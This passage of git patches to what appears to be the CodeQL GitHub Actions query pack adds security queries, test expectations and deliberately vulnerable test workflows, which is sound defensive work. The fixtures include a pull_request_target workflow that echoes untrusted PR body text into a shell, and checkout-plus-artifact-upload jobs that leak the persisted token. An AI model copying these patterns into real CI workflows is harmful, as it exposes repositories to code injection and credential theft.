.github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | -| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | semmle.label | python test.py | subpaths #select | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index da10247f1e0f..431386fae068 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -14,7 +14,6 @@ edges | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | -| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | @@ -46,8 +45,5 @@ nodes | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | -| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | semmle.label | python test.py | subpaths #select -| .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | python test.py | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index d5ad134c9768..8707849328b8 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -147,6 +147,13 @@ edges | .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/workflows/untrusted_checkout4.yml:12:7:13:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:13:7:32:2 | Uses Step | +| .github/workflows/untrusted_checkout4.yml:37:7:55:4 | Uses Step: get-pr | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | +| .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:79:7:91:4 | Uses Step | +| .github/workflows/untrusted_checkout4.yml:79:7:91:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:91:7:100:9 | Run Step | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | @@ -171,5 +178,8 @@ edges | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | | .github/workflows/test9.yml:16:9:17:48 | Run Step | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | From ac7b7b716260a63258870826588c10a90c5b76e4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 10:50:58 +0200 Subject: [PATCH 483/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 887228ecf882..3fb25b389f89 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.37 +version: 0.1.38 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index b0d446479d88..c806f76f42bb 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.37 +version: 0.1.38 groups: [actions, queries] suites: codeql-suites extractor: javascript From 4820626f291354570ea113c9c32155ae8ec68757 Mon Sep 17 00:00:00 2001 From: Rasmus Wriedt Larsen Date: Fri, 6 Sep 2024 14:04:46 +0200 Subject: [PATCH 484/707] Add SyntaxError query This can be used by autofix, but might also be nice to help find YAML syntax errors :shrug: --- ql/src/Debug/SyntaxError.ql | 17 +++++++++++++++++ .../SyntaxError/SyntaxError.expected | 1 + .../query-tests/SyntaxError/SyntaxError.qlref | 1 + ql/test/query-tests/SyntaxError/options | 1 + 4 files changed, 20 insertions(+) create mode 100644 ql/src/Debug/SyntaxError.ql create mode 100644 ql/test/query-tests/SyntaxError/SyntaxError.expected create mode 100644 ql/test/query-tests/SyntaxError/SyntaxError.qlref create mode 100644 ql/test/query-tests/SyntaxError/options diff --git a/ql/src/Debug/SyntaxError.ql b/ql/src/Debug/SyntaxError.ql new file mode 100644 index 000000000000..9a638ad7fbe2 --- /dev/null +++ b/ql/src/Debug/SyntaxError.ql @@ -0,0 +1,17 @@ +/** + * @name Syntax error + * @description A piece of code could not be parsed due to syntax errors. + * @kind problem + * @problem.severity recommendation + * @id actions/syntax-error + * @tags reliability + * correctness + * language-features + * debug + * @precision very-high + */ + +private import codeql.actions.ast.internal.Yaml + +from YamlParseError pe +select pe, pe.getMessage() diff --git a/ql/test/query-tests/SyntaxError/SyntaxError.expected b/ql/test/query-tests/SyntaxError/SyntaxError.expected new file mode 100644 index 000000000000..386e6554e2dc --- /dev/null +++ b/ql/test/query-tests/SyntaxError/SyntaxError.expected @@ -0,0 +1 @@ +| .github/workflows/malformed.yml:7:4:7:4 | expected , but found '' | expected , but found '' | diff --git a/ql/test/query-tests/SyntaxError/SyntaxError.qlref b/ql/test/query-tests/SyntaxError/SyntaxError.qlref new file mode 100644 index 000000000000..97c5686103cf --- /dev/null +++ b/ql/test/query-tests/SyntaxError/SyntaxError.qlref @@ -0,0 +1 @@ +Debug/SyntaxError.ql diff --git a/ql/test/query-tests/SyntaxError/options b/ql/test/query-tests/SyntaxError/options new file mode 100644 index 000000000000..096355709a6f --- /dev/null +++ b/ql/test/query-tests/SyntaxError/options @@ -0,0 +1 @@ +semmle-extractor-options: --tolerate-parse-errors --experimental From 2f68e6f26e352ce0373300b386828a5cd05c7633 Mon Sep 17 00:00:00 2001 From: Rasmus Wriedt Larsen Date: Fri, 6 Sep 2024 14:53:46 +0200 Subject: [PATCH 485/707] Add missing test file --- .../SyntaxError/.github/workflows/malformed.yml | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml diff --git a/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml b/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml new file mode 100644 index 000000000000..a8bfa4ae19a2 --- /dev/null +++ b/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml @@ -0,0 +1,7 @@ +on: pull_request_target + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo ${{ github.event.pull_request.body}} From fefeae44690ce1cbe9b3caba8fbbf4a00878a47e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 17:00:15 +0200 Subject: [PATCH 486/707] feat: New query to report GITHUB_TOKEN exposed in artifacts --- ql/src/Security/CWE-312/SecretsInArtifacts.ql | 40 +++++++++++++++++++ .../workflows/secrets-in-artifacts.yml | 23 +++++++++++ .../CWE-312/SecretsInArtifacts.expected | 1 + .../Security/CWE-312/SecretsInArtifacts.qlref | 2 + 4 files changed, 66 insertions(+) create mode 100644 ql/src/Security/CWE-312/SecretsInArtifacts.ql create mode 100644 ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml create mode 100644 ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected create mode 100644 ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.ql b/ql/src/Security/CWE-312/SecretsInArtifacts.ql new file mode 100644 index 000000000000..07e498706d88 --- /dev/null +++ b/ql/src/Security/CWE-312/SecretsInArtifacts.ql @@ -0,0 +1,40 @@ +/** + * @name Secret In Artifacts + * @description Secrets are exposed in GitHub Artifacts + * @kind problem + * @problem.severity error + * @security-severity 9.0 + * @precision high + * @id actions/secrets-in-artifacts + * @tags actions + * security + * experimental + * external/cwe/cwe-312 + */ + +import actions + +from UsesStep checkout, UsesStep upload +where + checkout.getCallee() = "actions/checkout" and + upload.getCallee() = "actions/upload-artifact" and + checkout.getAFollowingStep() = upload and + ( + not exists(checkout.getArgument("persist-credentials")) or + checkout.getArgument("persist-credentials") = "true" + ) and + upload.getVersion() = + [ + "v4.3.6", "834a144ee995460fba8ed112a2fc961b36a5ec5a", // + "v4.3.5", "89ef406dd8d7e03cfd12d9e0a4a378f454709029", // + "v4.3.4", "0b2256b8c012f0828dc542b3febcab082c67f72b", // + "v4.3.3", "65462800fd760344b1a7b4382951275a0abb4808", // + "v4.3.2", "1746f4ab65b179e0ea60a494b83293b640dd5bba", // + "v4.3.1", "5d5d22a31266ced268874388b861e4b58bb5c2f3", // + "v4.3.0", "26f96dfa697d77e81fd5907df203aa23a56210a8", // + "v4.2.0", "694cdabd8bdb0f10b2cea11669e1bf5453eed0a6", // + "v4.1.0", "1eb3cb2b3e0f29609092a73eb033bb759a334595", // + "v4.0.0", "c7d193f32edcb7bfad88892161225aeda64e9392", // + ] +select upload, "A secret is exposed in a public artifact uploaded by $@", upload, + "actions/upload-artifact" diff --git a/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml b/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml new file mode 100644 index 000000000000..611ac16dcfaa --- /dev/null +++ b/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml @@ -0,0 +1,23 @@ +name: secrets-in-artifacts +on: + pull_request: +jobs: + test1: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: results + test2: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: "Upload artifact" + uses: actions/upload-artifact@v4 + with: + name: file + path: results + diff --git a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected new file mode 100644 index 000000000000..67c7fd6e8aac --- /dev/null +++ b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected @@ -0,0 +1 @@ +| .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | actions/upload-artifact | diff --git a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref new file mode 100644 index 000000000000..c9bb538a12d3 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref @@ -0,0 +1,2 @@ +Security/CWE-312/SecretsInArtifacts.ql + From 6eef51e4154410af85604069a74a202d576052fb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 17:22:44 +0200 Subject: [PATCH 487/707] fix: add path checks --- ql/src/Security/CWE-312/SecretsInArtifacts.ql | 8 ++- .../workflows/secrets-in-artifacts.yml | 51 +++++++++++++++++-- .../CWE-312/SecretsInArtifacts.expected | 3 ++ 3 files changed, 56 insertions(+), 6 deletions(-) diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.ql b/ql/src/Security/CWE-312/SecretsInArtifacts.ql index 07e498706d88..e2d8ba93452c 100644 --- a/ql/src/Security/CWE-312/SecretsInArtifacts.ql +++ b/ql/src/Security/CWE-312/SecretsInArtifacts.ql @@ -35,6 +35,12 @@ where "v4.2.0", "694cdabd8bdb0f10b2cea11669e1bf5453eed0a6", // "v4.1.0", "1eb3cb2b3e0f29609092a73eb033bb759a334595", // "v4.0.0", "c7d193f32edcb7bfad88892161225aeda64e9392", // - ] + ] and + ( + not exists(checkout.getArgument("path")) and + upload.getArgument("path") = [".", "*"] + or + checkout.getArgument("path") + ["", "/*"] = upload.getArgument("path") + ) select upload, "A secret is exposed in a public artifact uploaded by $@", upload, "actions/upload-artifact" diff --git a/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml b/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml index 611ac16dcfaa..f77a2ab30d3b 100644 --- a/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml +++ b/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml @@ -2,7 +2,7 @@ name: secrets-in-artifacts on: pull_request: jobs: - test1: + test1: # VULNERABLE runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 @@ -10,8 +10,8 @@ jobs: uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 with: name: file - path: results - test2: + path: . + test2: # NOT VULNERABLE runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 @@ -19,5 +19,46 @@ jobs: uses: actions/upload-artifact@v4 with: name: file - path: results - + path: . + test3: # VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: "*" + test4: # VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + path: foo + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: foo + test5: # VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + path: foo + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: foo/* + test6: # NOT VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + path: pr + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: foo diff --git a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected index 67c7fd6e8aac..1c7fd8ab2ce2 100644 --- a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected +++ b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected @@ -1 +1,4 @@ | .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | actions/upload-artifact | From 37fc6156d09c506e1453c466c84ee6697f0efa88 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 17:30:49 +0200 Subject: [PATCH 488/707] Removing experimental flag --- ql/src/Security/CWE-312/SecretsInArtifacts.ql | 1 - 1 file changed, 1 deletion(-) diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.ql b/ql/src/Security/CWE-312/SecretsInArtifacts.ql index e2d8ba93452c..a7ed799f7610 100644 --- a/ql/src/Security/CWE-312/SecretsInArtifacts.ql +++ b/ql/src/Security/CWE-312/SecretsInArtifacts.ql @@ -8,7 +8,6 @@ * @id actions/secrets-in-artifacts * @tags actions * security - * experimental * external/cwe/cwe-312 */ From 25eb417acc989030ceb3acedd368ad584a671eec Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 17:32:35 +0200 Subject: [PATCH 489/707] Remove public wording --- ql/src/Security/CWE-312/SecretsInArtifacts.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.ql b/ql/src/Security/CWE-312/SecretsInArtifacts.ql index a7ed799f7610..494a955f96b4 100644 --- a/ql/src/Security/CWE-312/SecretsInArtifacts.ql +++ b/ql/src/Security/CWE-312/SecretsInArtifacts.ql @@ -41,5 +41,5 @@ where or checkout.getArgument("path") + ["", "/*"] = upload.getArgument("path") ) -select upload, "A secret is exposed in a public artifact uploaded by $@", upload, +select upload, "A secret is exposed in an artifact uploaded by $@", upload, "actions/upload-artifact" From 5e92026f145157c114040568ef4822fc465fff68 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 17:34:55 +0200 Subject: [PATCH 490/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 3fb25b389f89..046015a5da8a 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.38 +version: 0.1.39 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index c806f76f42bb..827836a2dce0 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.38 +version: 0.1.39 groups: [actions, queries] suites: codeql-suites extractor: javascript From 72e0851e910db7a85a545d6b0d058451812a17d4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 22:53:16 +0200 Subject: [PATCH 491/707] Update metadata for Secrets in Artifact query --- ql/src/Security/CWE-312/SecretsInArtifacts.ql | 7 ++++--- .../Security/CWE-312/SecretsInArtifacts.expected | 8 ++++---- 2 files changed, 8 insertions(+), 7 deletions(-) diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.ql b/ql/src/Security/CWE-312/SecretsInArtifacts.ql index 494a955f96b4..836f1c7dec28 100644 --- a/ql/src/Security/CWE-312/SecretsInArtifacts.ql +++ b/ql/src/Security/CWE-312/SecretsInArtifacts.ql @@ -1,9 +1,10 @@ /** - * @name Secret In Artifacts - * @description Secrets are exposed in GitHub Artifacts + * @name Storage of sensitive information in GitHub Actions artifact + * @description Including sensitive information in a GitHub Actions artifact can + * expose it to an attacker. * @kind problem * @problem.severity error - * @security-severity 9.0 + * @security-severity 7.5 * @precision high * @id actions/secrets-in-artifacts * @tags actions diff --git a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected index 1c7fd8ab2ce2..86ac293521cf 100644 --- a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected +++ b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected @@ -1,4 +1,4 @@ -| .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | actions/upload-artifact | -| .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | actions/upload-artifact | -| .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | actions/upload-artifact | -| .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | actions/upload-artifact | From 84b02febfe014642dadd572da3942713dea2a8ac Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 22:53:53 +0200 Subject: [PATCH 492/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 046015a5da8a..1a3918d5d986 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.39 +version: 0.1.40 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 827836a2dce0..64d40f754805 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.39 +version: 0.1.40 groups: [actions, queries] suites: codeql-suites extractor: javascript From 279b0bb8f175e9b968972ed170fe9f964e8d311d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 23:33:46 +0200 Subject: [PATCH 493/707] Change description for CWE-1395 query --- ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md | 2 +- ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md index 61fab1d8ed49..91360a30ed88 100644 --- a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md +++ b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md @@ -2,7 +2,7 @@ ## Description -The security of the workflow and the repository could be compromised by GitHub Actions workflows that utilize third-party GitHub Actions with known vulnerabilities. +The security of the workflow and the repository could be compromised by GitHub Actions workflows that utilize GitHub Actions with known vulnerabilities. ## Recommendations diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql index c0a81b66a480..497a3b9feb9b 100644 --- a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql +++ b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql @@ -1,6 +1,6 @@ /** - * @name Use of known vulnerable 3rd party action. - * @description The workflow is using a known vulnerable 3rd party action. + * @name Use of a known vulnerable action. + * @description The workflow is using an action with known vulnerabilities. * @kind problem * @problem.severity error * @security-severity 7.5 From 2720aaf0972e62691ff50af8bc9545a1f55e918e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 23:36:29 +0200 Subject: [PATCH 494/707] Add new test for secrets in artifact query --- .../workflows/secrets-in-artifacts.yml | 23 +++++++++++++++++++ .../CWE-312/SecretsInArtifacts.expected | 1 + 2 files changed, 24 insertions(+) diff --git a/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml b/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml index f77a2ab30d3b..473d59986957 100644 --- a/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml +++ b/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml @@ -62,3 +62,26 @@ jobs: with: name: file path: foo + test7: # NOT VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + persist-credentials: false + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: . + test8: # VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + persist-credentials: true + - name: 